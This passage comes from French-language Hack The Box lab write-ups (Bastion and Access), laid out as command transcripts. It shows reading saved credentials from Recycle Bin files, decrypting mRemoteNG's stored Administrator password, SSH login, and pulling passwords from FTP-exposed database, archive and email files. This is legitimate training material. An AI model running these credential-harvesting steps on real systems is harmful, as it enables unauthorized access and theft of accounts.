</span> </span></span><span class="line"><span class="cl"> ®®ÊÔ__ C : <span class="se">\ </span>U s e r s <span class="se">\ </span>L <span class="m">4</span> m p j e <span class="se">\ </span>A p p D a t a <span class="se">\ </span>R o a m i n g <span class="se">\ </span>M i c r o s o f t <span class="se">\ </span>W i n d o w s <span class="se">\ </span> </span></span><span class="line"><span class="cl">S t a r t M e n u <span class="se">\ </span>P r o g r a m s <span class="se">\ </span>S t a r t u p <span class="se">\ </span>P e t e r - s c r i p t . b a t </span></span><span class="line"><span class="cl">PS C:<span class="se">\$</span>Recycle.Bin<span class="se">\S</span>-1-5-21-2146344083-2443430429-1430880910-1002&gt; cat <span class="s1">&#39;$R1MMX2E.txt&#39;</span> </span></span><span class="line"><span class="cl">NET USE Z: <span class="s2">&#34;\\192.168.1.74\Backups&#34;</span> /user:L4mpje /pass:bureaulampje </span></span><span class="line"><span class="cl">PS C:<span class="se">\$</span>Recycle.Bin<span class="se">\S</span>-1-5-21-2146344083-2443430429-1430880910-1002&gt; cat <span class="s1">&#39;$RNTSJCP.bat&#39;</span> </span></span><span class="line"><span class="cl">NET USE Z: <span class="s2">&#34;\\192.168.1.74\Backups&#34;</span> /user:Peter 3RTTT5zNt2 </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="mremoteng">mRemoteNG </h3><p>En regardant les logiciels installés de plus près, on observe un logiciel intéressant et suspect. Il permet de se connecter à des systèmes en s&rsquo;authentificant avec des mots de passe stocker dans sa configuration.</p> <h3 id="recuperation-du-fichier-de-configuration">Recuperation du fichier de configuration </h3><p>En cherchant sur internet on trouve cette info :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">%APPDATA%<span class="se">\m</span>RemoteNG<span class="se">\c</span>onfCons.xml </span></span></code></pre></td></tr></table> </div> </div><p>Ce fichier semble contenir les mots de passe d&rsquo;après un internaute. Après vérification, on retrouve le hachage du mot de passe de l&rsquo;Administrateur ainsi que celui de L4mpje :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\L</span>4mpje<span class="se">\A</span>ppdata<span class="se">\R</span>oaming<span class="se">\m</span>RemoteNG&gt; ls </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory: C:<span class="se">\U</span>sers<span class="se">\L</span>4mpje<span class="se">\A</span>ppdata<span class="se">\R</span>oaming<span class="se">\m</span>RemoteNG </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">d----- 22-2-2019 14:01 Themes </span></span><span class="line"><span class="cl">-a---- 22-2-2019 14:03 <span class="m">6316</span> confCons.xml </span></span><span class="line"><span class="cl">-a---- 22-2-2019 14:02 <span class="m">6194</span> confCons.xml.20190222-1402277353.backup </span></span><span class="line"><span class="cl">-a---- 22-2-2019 14:02 <span class="m">6206</span> confCons.xml.20190222-1402339071.backup </span></span><span class="line"><span class="cl">-a---- 22-2-2019 14:02 <span class="m">6218</span> confCons.xml.20190222-1402379227.backup </span></span><span class="line"><span class="cl">-a---- 22-2-2019 14:02 <span class="m">6231</span> confCons.xml.20190222-1403070644.backup </span></span><span class="line"><span class="cl">-a---- 22-2-2019 14:03 <span class="m">6319</span> confCons.xml.20190222-1403100488.backup </span></span><span class="line"><span class="cl">-a---- 22-2-2019 14:03 <span class="m">6318</span> confCons.xml.20190222-1403220026.backup </span></span><span class="line"><span class="cl">-a---- 22-2-2019 14:03 <span class="m">6315</span> confCons.xml.20190222-1403261268.backup </span></span><span class="line"><span class="cl">-a---- 22-2-2019 14:03 <span class="m">6316</span> confCons.xml.20190222-1403272831.backup </span></span><span class="line"><span class="cl">-a---- 22-2-2019 14:03 <span class="m">6315</span> confCons.xml.20190222-1403433299.backup </span></span><span class="line"><span class="cl">-a---- 22-2-2019 14:03 <span class="m">6316</span> confCons.xml.20190222-1403486580.backup </span></span><span class="line"><span class="cl">-a---- 22-2-2019 14:03 <span class="m">51</span> extApps.xml </span></span><span class="line"><span class="cl">-a---- 22-2-2019 14:03 <span class="m">5217</span> mRemoteNG.log </span></span><span class="line"><span class="cl">-a---- 22-2-2019 14:03 <span class="m">2245</span> pnlLayout.xml </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\L</span>4mpje<span class="se">\A</span>ppdata<span class="se">\R</span>oaming<span class="se">\m</span>RemoteNG&gt; cat .<span class="se">\c</span>onfCons.xml </span></span><span class="line"><span class="cl">&lt;?xml <span class="nv">version</span><span class="o">=</span><span class="s2">&#34;1.0&#34;</span> <span class="nv">encoding</span><span class="o">=</span><span class="s2">&#34;utf-8&#34;</span>?&gt; </span></span><span class="line"><span class="cl">&lt;mrng:Connections xmlns:mrng<span class="o">=</span><span class="s2">&#34;http://mremoteng.org&#34;</span> <span class="nv">Name</span><span class="o">=</span><span class="s2">&#34;Connections&#34;</span> <span class="nv">Export</span><span class="o">=</span><span class="s2">&#34;false&#34;</span> <span class="nv">EncryptionEngine</span><span class="o">=</span><span class="s2">&#34;AES&#34;</span> <span class="nv">BlockCipherMode</span><span class="o">=</span><span class="s2">&#34;GC </span></span></span><span class="line"><span class="cl"><span class="s2">M&#34;</span> <span class="nv">KdfIterations</span><span class="o">=</span><span class="s2">&#34;1000&#34;</span> <span class="nv">FullFileEncryption</span><span class="o">=</span><span class="s2">&#34;false&#34;</span> <span class="nv">Protected</span><span class="o">=</span><span class="s2">&#34;ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0 </span></span></span><span class="line"><span class="cl"><span class="s2">oop8R8ddXKAx4KK7sAk6AA&#34;</span> <span class="nv">ConfVersion</span><span class="o">=</span><span class="s2">&#34;2.6&#34;</span>&gt; </span></span><span class="line"><span class="cl"> &lt;Node <span class="nv">Name</span><span class="o">=</span><span class="s2">&#34;DC&#34;</span> <span class="nv">Type</span><span class="o">=</span><span class="s2">&#34;Connection&#34;</span> <span class="nv">Descr</span><span class="o">=</span><span class="s2">&#34;&#34;</span> <span class="nv">Icon</span><span class="o">=</span><span class="s2">&#34;mRemoteNG&#34;</span> <span class="nv">Panel</span><span class="o">=</span><span class="s2">&#34;General&#34;</span> <span class="nv">Id</span><span class="o">=</span><span class="s2">&#34;500e7d58-662a-44d4-aff0-3a4f547a3fee&#34;</span> Userna </span></span><span class="line"><span class="cl"><span class="nv">me</span><span class="o">=</span><span class="s2">&#34;Administrator&#34;</span> <span class="nv">Domain</span><span class="o">=</span><span class="s2">&#34;&#34;</span> <span class="nv">Password</span><span class="o">=</span><span class="s2">&#34;aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==&#34;</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> &lt;Node <span class="nv">Name</span><span class="o">=</span><span class="s2">&#34;L4mpje-PC&#34;</span> <span class="nv">Type</span><span class="o">=</span><span class="s2">&#34;Connection&#34;</span> <span class="nv">Descr</span><span class="o">=</span><span class="s2">&#34;&#34;</span> <span class="nv">Icon</span><span class="o">=</span><span class="s2">&#34;mRemoteNG&#34;</span> <span class="nv">Panel</span><span class="o">=</span><span class="s2">&#34;General&#34;</span> <span class="nv">Id</span><span class="o">=</span><span class="s2">&#34;8d3579b2-e68e-48c1-8f0f-9ee1347c9128&#34;</span> </span></span><span class="line"><span class="cl"> <span class="nv">Username</span><span class="o">=</span><span class="s2">&#34;L4mpje&#34;</span> <span class="nv">Domain</span><span class="o">=</span><span class="s2">&#34;&#34;</span> <span class="nv">Password</span><span class="o">=</span><span class="s2">&#34;yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB&#34;</span> </span></span><span class="line"><span class="cl"> ... </span></span></code></pre></td></tr></table> </div> </div><p>Donc : Administrator : <code>aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==</code></p> <h3 id="déchiffrement-du-hachage-de-ladministrateur">Déchiffrement du hachage de l&rsquo;Administrateur </h3><p>Un outil est dispo sur github pour cracker ce genre de fichier : <a class="link" href="https://github.com/haseebT/mRemoteNG-Decrypt" target="_blank" rel="noopener" >https://github.com/haseebT/mRemoteNG-Decrypt</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Bastion/mRemoteNG-Decrypt<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw<span class="o">==</span> </span></span><span class="line"><span class="cl">Password: thXLHM96BeKL0ER2 </span></span></code></pre></td></tr></table> </div> </div><h3 id="connection-en-ssh---root-flag">Connection en SSH - root flag </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Bastion<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ssh Administrator@10.10.10.134 </span></span><span class="line"><span class="cl">Administrator@10.10.10.134<span class="err">&#39;</span>s password: ** thXLHM96BeKL0ER2 ** </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Microsoft Windows <span class="o">[</span>Version 10.0.14393<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">(</span>c<span class="o">)</span> <span class="m">2016</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">administrator@BASTION C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator&gt;type Desktop<span class="se">\r</span>oot.txt </span></span><span class="line"><span class="cl">e90b.....42f6 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/access-htb/Tue, 18 Feb 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/access-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Access cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Access</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.98</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">security : 4Cc3ssC0ntr0ller </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Access<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.98 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">21/tcp open ftp syn-ack ttl <span class="m">127</span> Microsoft ftpd </span></span><span class="line"><span class="cl"><span class="p">|</span> ftp-anon: Anonymous FTP login allowed <span class="o">(</span>FTP code 230<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_Can<span class="err">&#39;</span>t get directory listing: TIMEOUT </span></span><span class="line"><span class="cl"><span class="p">|</span> ftp-syst: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ SYST: Windows_NT </span></span><span class="line"><span class="cl">23/tcp open telnet syn-ack ttl <span class="m">127</span> Microsoft Windows XP telnetd </span></span><span class="line"><span class="cl"><span class="p">|</span> telnet-ntlm-info: </span></span><span class="line"><span class="cl"><span class="p">|</span> Target_Name: ACCESS </span></span><span class="line"><span class="cl"><span class="p">|</span> NetBIOS_Domain_Name: ACCESS </span></span><span class="line"><span class="cl"><span class="p">|</span> NetBIOS_Computer_Name: ACCESS </span></span><span class="line"><span class="cl"><span class="p">|</span> DNS_Domain_Name: ACCESS </span></span><span class="line"><span class="cl"><span class="p">|</span> DNS_Computer_Name: ACCESS </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Product_Version: 6.1.7600 </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">127</span> Microsoft IIS httpd 7.5 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Microsoft-IIS/7.5 </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span> Supported Methods: OPTIONS TRACE GET HEAD POST </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Potentially risky methods: TRACE </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: MegaCorp </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="ftp-anonymous-connexion-gettings-2-files">FTP Anonymous connexion: Gettings 2 files </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Access/Access Control<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ftp 10.10.10.98 </span></span><span class="line"><span class="cl">Connected to 10.10.10.98. </span></span><span class="line"><span class="cl"><span class="m">220</span> Microsoft FTP Service </span></span><span class="line"><span class="cl">Name <span class="o">(</span>10.10.10.98:kali<span class="o">)</span>: anonymous </span></span><span class="line"><span class="cl"><span class="m">331</span> Anonymous access allowed, send identity <span class="o">(</span>e-mail name<span class="o">)</span> as password. </span></span><span class="line"><span class="cl">Password: </span></span><span class="line"><span class="cl"><span class="m">230</span> User logged in. </span></span><span class="line"><span class="cl">Remote system <span class="nb">type</span> is Windows_NT. </span></span><span class="line"><span class="cl">ftp&gt; dir </span></span><span class="line"><span class="cl"><span class="m">425</span> Cannot open data connection. </span></span><span class="line"><span class="cl"><span class="m">200</span> PORT <span class="nb">command</span> successful. </span></span><span class="line"><span class="cl"><span class="m">150</span> Opening ASCII mode data connection. </span></span><span class="line"><span class="cl">08-23-18 08:16PM &lt;DIR&gt; Backups </span></span><span class="line"><span class="cl">08-24-18 09:00PM &lt;DIR&gt; Engineer </span></span><span class="line"><span class="cl"><span class="m">226</span> Transfer complete. </span></span><span class="line"><span class="cl">ftp&gt; <span class="nb">cd</span> Backups </span></span><span class="line"><span class="cl"><span class="m">250</span> CWD <span class="nb">command</span> successful. </span></span><span class="line"><span class="cl">ftp&gt; dir </span></span><span class="line"><span class="cl"><span class="m">200</span> PORT <span class="nb">command</span> successful. </span></span><span class="line"><span class="cl"><span class="m">125</span> Data connection already open<span class="p">;</span> Transfer starting. </span></span><span class="line"><span class="cl">08-23-18 08:16PM <span class="m">5652480</span> backup.mdb </span></span><span class="line"><span class="cl"><span class="m">226</span> Transfer complete. </span></span><span class="line"><span class="cl">ftp&gt; <span class="nb">cd</span> ../Engineer </span></span><span class="line"><span class="cl"><span class="m">250</span> CWD <span class="nb">command</span> successful. </span></span><span class="line"><span class="cl">ftp&gt; dir </span></span><span class="line"><span class="cl"><span class="m">200</span> PORT <span class="nb">command</span> successful. </span></span><span class="line"><span class="cl"><span class="m">150</span> Opening ASCII mode data connection. </span></span><span class="line"><span class="cl">08-24-18 12:16AM <span class="m">10870</span> Access Control.zip </span></span><span class="line"><span class="cl"><span class="m">226</span> Transfer complete. </span></span><span class="line"><span class="cl">ftp&gt; ^D </span></span><span class="line"><span class="cl"><span class="m">221</span> Goodbye. </span></span></code></pre></td></tr></table> </div> </div><h3 id="backupmdb-and-access-controlzip">backup.mdb and Access Control.zip </h3><p>En analysant les tables disponibles dans le fichier backup.mdb, on trouve la table &ldquo;auth_user&rdquo; qui contient un champs PASSWORD potentiellement intéressant.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Access<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ mdb-schema backup.mdb <span class="p">|</span> grep -i PASSWORD -A30 -B30 </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">CREATE TABLE <span class="o">[</span>auth_user<span class="o">]</span> </span></span><span class="line"><span class="cl"> <span class="o">(</span> </span></span><span class="line"><span class="cl"> <span class="o">[</span>id<span class="o">]</span> Long Integer, </span></span><span class="line"><span class="cl"> <span class="o">[</span>username<span class="o">]</span> Text <span class="o">(</span>50<span class="o">)</span>, </span></span><span class="line"><span class="cl"> <span class="o">[</span>password<span class="o">]</span> Text <span class="o">(</span>50<span class="o">)</span>, </span></span><span class="line"><span class="cl"> <span class="o">[</span>Status<span class="o">]</span> Long Integer, </span></span><span class="line"><span class="cl"> <span class="o">[</span>last_login<span class="o">]</span> DateTime, </span></span><span class="line"><span class="cl"> <span class="o">[</span>RoleID<span class="o">]</span> Long Integer, </span></span><span class="line"><span class="cl"> <span class="o">[</span>Remark<span class="o">]</span> Memo/Hyperlink <span class="o">(</span>255<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><p>On extrait la table auth_user et on récupère 3 credentials user/password.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Access<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ mdb-export backup.mdb auth_user </span></span><span class="line"><span class="cl">id,username,password,Status,last_login,RoleID,Remark </span></span><span class="line"><span class="cl">25,<span class="s2">&#34;admin&#34;</span>,<span class="s2">&#34;admin&#34;</span>,1,<span class="s2">&#34;08/23/18 21:11:47&#34;</span>,26, </span></span><span class="line"><span class="cl">27,<span class="s2">&#34;engineer&#34;</span>,<span class="s2">&#34;access4u@security&#34;</span>,1,<span class="s2">&#34;08/23/18 21:13:36&#34;</span>,26, </span></span><span class="line"><span class="cl">28,<span class="s2">&#34;backup_admin&#34;</span>,<span class="s2">&#34;admin&#34;</span>,1,<span class="s2">&#34;08/23/18 21:14:02&#34;</span>,26, </span></span></code></pre></td></tr></table> </div> </div><p>En ftp et telnet, aucun ne fonctionne. Cependant, en utilisant le mot de passe &ldquo;access4u@security&rdquo; sur le fichier &ldquo;Access Control.zip&rdquo;, l&rsquo;archive se décompresse correctement !</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Access<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ 7z x Access<span class="se">\ </span>Control.zip </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">7-Zip 24.09 <span class="o">(</span>x64<span class="o">)</span> : Copyright <span class="o">(</span>c<span class="o">)</span> 1999-2024 Igor Pavlov : 2024-11-29 </span></span><span class="line"><span class="cl"> 64-bit <span class="nv">locale</span><span class="o">=</span>en_US.UTF-8 Threads:3 OPEN_MAX:1024 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Scanning the drive <span class="k">for</span> archives: </span></span><span class="line"><span class="cl"><span class="m">1</span> file, <span class="m">10870</span> bytes <span class="o">(</span><span class="m">11</span> KiB<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Extracting archive: Access Control.zip </span></span><span class="line"><span class="cl">-- </span></span><span class="line"><span class="cl"><span class="nv">Path</span> <span class="o">=</span> Access Control.zip </span></span><span class="line"><span class="cl"><span class="nv">Type</span> <span class="o">=</span> zip </span></span><span class="line"><span class="cl">Physical <span class="nv">Size</span> <span class="o">=</span> <span class="m">10870</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Enter password <span class="o">(</span>will not be echoed<span class="o">)</span>: <span class="o">&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;</span>&lt; access4u@security </span></span><span class="line"><span class="cl">Everything is Ok </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Size: <span class="m">271360</span> </span></span><span class="line"><span class="cl">Compressed: <span class="m">10870</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Access<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ls </span></span><span class="line"><span class="cl"><span class="s1">&#39;Access Control.pst&#39;</span> <span class="s1">&#39;Access Control.zip&#39;</span> auth_user.txt backup.mdb </span></span></code></pre></td></tr></table> </div> </div><h3 id="extracting-emails-from-pst-file">Extracting emails from pst file </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Access<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ readpst -r Access<span class="se">\ </span>Control.pst </span></span><span class="line"><span class="cl">Opening PST file and indexes... </span></span><span class="line"><span class="cl">Processing Folder <span class="s2">&#34;Deleted Items&#34;</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Access Control&#34;</span> - <span class="m">2</span> items <span class="k">done</span>, <span class="m">0</span> items skipped. </span></span></code></pre></td></tr></table> </div> </div><h3 id="getting-security-account-password-from-emails">Getting &ldquo;security&rdquo; account password from emails </h3><p>security: <code>4Cc3ssC0ntr0ller</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Access/Access Control<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ cat mbox <span class="p">|</span> grep pass </span></span><span class="line"><span class="cl">The password <span class="k">for</span> the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers. </span></span><span class="line"><span class="cl">&lt;/o:shapelayout&gt;&lt;/xml&gt;&lt;!<span class="o">[</span>endif<span class="o">]</span>--&gt;&lt;/head&gt;&lt;body <span class="nv">lang</span><span class="o">=</span>EN-US <span class="nv">link</span><span class="o">=</span><span class="s2">&#34;#0563C1&#34;</span> <span class="nv">vlink</span><span class="o">=</span><span class="s2">&#34;#954F72&#34;</span>&gt;&lt;div <span class="nv">class</span><span class="o">=</span>WordSection1&gt;&lt;p <span class="nv">class</span><span class="o">=</span>MsoNormal&gt;Hi there,&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;p <span class="nv">class</span><span class="o">=</span>MsoNormal&gt;&lt;o:p&gt;<span class="p">&amp;</span>nbsp<span class="p">;</span>&lt;/o:p&gt;&lt;/p&gt;&lt;p <span class="nv">class</span><span class="o">=</span>MsoNormal&gt;The password <span 